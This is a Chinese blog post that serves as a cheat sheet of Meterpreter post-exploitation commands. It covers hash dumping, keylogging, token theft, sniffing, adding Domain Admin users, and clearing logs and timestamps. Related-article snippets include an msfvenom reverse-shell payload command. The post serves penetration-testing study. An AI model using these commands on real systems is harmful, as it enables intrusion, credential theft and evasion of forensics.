[后渗透]获取到 Meterpreter 之后的操作

最新推荐文章于 2023-09-17 11:49:57 发布
最新推荐文章于 2023-09-17 11:49:57 发布
阅读量974 收藏 10
点赞数
分类专栏: hack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lvwuwei/article/details/106348975
版权

[后渗透]获取到 Meterpreter 之后的操作

本文章向大家介绍[后渗透]获取到 Meterpreter 之后的操作,主要包括[后渗透]获取到 Meterpreter 之后的操作使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
sysinfo
列出受控主机的系统信息

ls
列出目标主机的文件和文件夹信息

use priv
加载特权提升扩展模块,来扩展meterpreter库

ps
显示所有运行进程以及关联的用户账户

getsystem
通过各种攻击向量来提升到系统用户权限

shell
以所有可用令牌来运行一个交互的shell

screenshot
对目标主机的屏幕进行截图

upload file
向目标主机上传文件

download file
从目标主机下载文件

keyscan_dump
存储目标主机上或许的键盘记录

getprivs
尽可能多的获取目标主机上的特权

background
将你当前的meterpreter shell转为后台执行

hashdump
导出目标主机中的口令哈希值
help
打开帮助

run scriptname
运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名

migrate PID
迁移到一个指定的进程ID

use incognito
加载inconito功能(用来盗取目标主机的令牌或是假冒用户)

list_tokens -u
列出目标主机用户组的可用令牌

impersonate_token DOMAIN_NAME\USERNAME
假冒目标主机上的可用令牌。

steal_token
盗窃给定进程的可用令牌并进行令牌假冒

drop_token
停止假冒当前的令牌
execute -f cmd.exe -i
执行cmd.exe命令并进行交互。

execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令。

execute -f cmd.exe -i -H -t
以所有可用令牌来执行cmd命令并隐藏该进程。
rev2self
回到控制目标主机的初始用户账户下。

reg command
在目标主机注册表中进行交互,创建,删除和查询等操作。

setdesktop number
切换到另一个用户界面(该功能基于那些用户已登录)。

uietl enable keyboard/mouse
接管目标主机的键盘和鼠标。
use sniffer
加载嗅探模块

sniffer_interfaces
列出目标主机所有开放的网络接口

sniffer_dump interfaceID pcapname
在目标主机上启动嗅探

sniffer_start interfaceID packet_buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探

sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据

sniffer_stop interfaceID
停止嗅探
add_user username password -h ip
在远程目标主机上添加一个用户

add_group_user “Domain Adimins”username -h ip
将用户添加到目标主机的域管理员组中

clearev
清除目标主机上的日志记录

timestomp
修改文件属性,例如修改文件的创建时间(反取证调差)

reboot
重启目标主机

lvwuwei
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
metasploit后渗透入门--meterpreter
Yale的博客
01-14 3225
0x01利用漏洞拿到Meterpreter。 将存放在桌面上的exploit文件复制到metasploit系统指定的exploits存储路径中,并将exploit的属性设置为644. cp ~/Desktop/ms14_064_ole_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/browser/ chmod...
渗透之——Meterpreter以被控制的计算机为跳板渗透其他服务器
冰河的专栏
01-14 2479
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86475550 攻击机:Kali 192.168.75.10 跳板: Metasploitable2 192.168.75.130 目标机: Windows Server 2012 192.168.75.140 这里无法通过Kali(192.168.75.10)主机直接访问...
msf后渗透Meterpreter命令)
2302_76986722的博客
09-17 451
6 ,获取meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权。kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用。filenname,path这两个也可以进行设置,比如名字改成qq.exe,就会qq在提权,更容易上。
渗透之——Metasploit-Meterpreter Shell信息收集相关的命令
冰河的专栏
01-06 1811
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85944005 PS:以下所有的命令都是在Metasploit-Meterpreter Shell下执行的。 一、进程迁移 1、获取目标机正在运行的进程 ps 2.查看Meterpreter Shell的进程号 getpid 3.将Meterpreter Shell进程绑...
MSF中meterpreter和普通shell的区别
00勇士王子的博客
09-24 2307
使用wireshark流量分析证明MSF中meterprete和普通shell的区别
meterpreter渗透模块最新实操视频
11-02
这个教程主要侧重于内网渗透metasploit中的meterete视频实操,小编自认为不错,因为免费分享给更多人学习,想学习更多内容下载后按照向导关注我们的自媒体平台即可,谢谢支持!
79-79.渗透测试-meterpreter介绍.mp4
最新发布
05-10
79-79.渗透测试-meterpreter介绍.mp4
渗透工具Meterpreter功能介绍及使用教程
12-29
渗透工具Meterpreter功能介绍及使用教程
渗透测试-后渗透阶段.pdf
02-25
渗透阶段是在渗透测试中,获取到目标系统控制权之后进行的操作,这个阶段的主要目的是为了获得更多的信息,并且保持对目标系统的控制。这个阶段的操作主要包括但不限于信息的收集、权限的提升、维持对系统的控制、...
meterpreter模块之后渗透攻击实战总结.docx
07-10
MeterpreterMetasploit 框架中的一个高级交互式渗透工具,它提供了一个功能丰富的 shell,允许攻击者在成功利用漏洞并获得目标系统的控制权后进行一系列的后续操作Meterpreter 模块的强大之处在于它能进行...
Meterpreter命令详解
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
获取meterpreter权限后如何留后门
黑锤的博客
09-21 2203
我们知道当我们拿到主机meterpreter权限是可以留后门进行持久化攻击,常见的cmd命令 创建文本,并向里出入内容,并打开: echo "hello I am hacker" >>1.txt 之后再打开:notepad 1.txt即可 拿永恒之蓝来说得到meterpreter后想要利用3389进行远程登录就得需要用户账号密码,一下有两种方法创建账号 方法一:利用msf的post后渗透攻击模块直接在 直接在meterpreter下创建,这种创建的账号直接就是administrat
Meterpreter使用总结(2)之后渗透攻击模块
热门推荐
CODING...
02-08 1万+
meterpreter虽然功能强大,作为单一的工具还是会有他功能的局限性,因此在metasploit4.0之后引入了后渗透攻击模块,通过在meterpreter中使用ruby编写的模块来进行进一步的渗透攻击。 (1)获取目标机器的分区情况: (2)判断是否为虚拟机: 如果有时候我们渗透测试的时候发现获得的目标机器是一个虚拟机,就要打醒十二分精神了,有可能这个是对方设置的一个蜜罐系统。
meterpreter命令使用
wutiangui的博客
04-25 637
getwd命令可以获得目标机上当前的工作目录,相似的命令有getlwd。使用edit命令可以调用vi编辑器,对目标机上的文件进行编辑。ipconfig命令用于获取目标主机上的网络接口信息。download命令从目标机上下载文件或文件夹。route命令用于显示目标主机的路由信息。在目标机上隐藏执行cmd.exe程序。background挂起会话。sysinfo查看系统信息。使用cat命令查看文件内容。sessions连接会话。
meterpreter渗透阶段的基本操作(一)
zwish的信安之路
12-28 1501
这里只是一个笔记,可能没有那么全面和有条理,都是自己遇到的一些问题 1、shell里的中文乱码 获得一个meterpreter shell之后,使用shell命令,显示中文时会出现乱码 解决方法:在输入shell之后,再输入chcp 65001 2、提权相关的问题 getuid发现不是管理员权限,使用getsystem命令提权(不使用参数默认使用全部提权方法)会报错,不成功、 (提权方式:1、g...
Meterpreter提权详解
子曰小玖的博客
08-08 3199
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windo...
渗透meterpreter使用攻略
钻石
01-06 8381
本文转载来源:https://xz.aliyun.com/t/2536 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessi...
渗透Meterpreter常用命令记录
Sp4rkW的博客
12-18 9112
基本命令 命令 解释 background 将meterpreter终端隐藏在后台(快捷键ctrl+z) sessions 查看已经成功获得的会话,如果想继续与某会话交互,可以使用sessions -i 命令. quit 直接关闭当前的meterpreter会话,返回MSF终端. shell 获取目标系统的控制台shell. irb 在meterpret
meterpreter里面cmd乱码解决方法chcp 65001
sweelg的博客
06-26 1628
当我们使用meterpreter反弹shell后使用是乱码时 可以采用如下命令解决 chcp 65501 chcp是一个计算机指令,能够显示或设置活动代码页编号。 65001 UTF-8代码页 950 繁体中文 936 简体中文默认的GBK 437 MS-DOS美国英语 ...
meterpreter渗透
04-07
Meterpreter是一种强大的后渗透工具,它可以在目标机器上执行各种命令和操作,包括文件系统访问、进程管理、网络扫描、密码破解、漏洞利用等等。在使用Meterpreter进行后渗透时,可以采取以下几个步骤: 1. 获取系统信息:使用sysinfo命令可以获取目标系统的详细信息,包括操作系统版本、硬件配置、用户信息等等,这些信息有助于后续的攻击操作。 2. 收集凭证信息:使用hashdump命令可以获取目标系统上保存的用户密码哈希值,然后可以使用破解工具进行破解,从而获取有效的登录凭证。 3. 扫描网络和主机:使用portscan和subnet命令可以对目标网络进行扫描,发现开放的服务和漏洞,然后可以使用exploit模块进行攻击。 4. 接管会话和持久化:使用migrate命令可以将Meterpreter会话转移到目标系统中的其他进程中,从而提高攻击的稳定性和隐蔽性。同时,还可以使用persist命令将Meterpreter程序持久化到目标系统中,以便于下次连接。 5. 进行攻击操作:利用Meterpreter的各种模块和命令,可以进行各种攻击操作,包括远程执行命令、上传下载文件、横向移动、权限提升、漏洞利用等等。 6. 残留清理:完成攻击后,应该进行残留的清理工作,包括删除日志文件、清除历史记录、删除痕迹等等,以避免被发现和追踪。 总之,Meterpreter是一款非常强大的后渗透工具,可以帮助渗透测试人员和黑客更好地进行攻击和渗透测试工作。但是,在使用Meterpreter进行攻击时,应该遵循道德和法律的原则,避免对他人造成不必要的损害和危害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值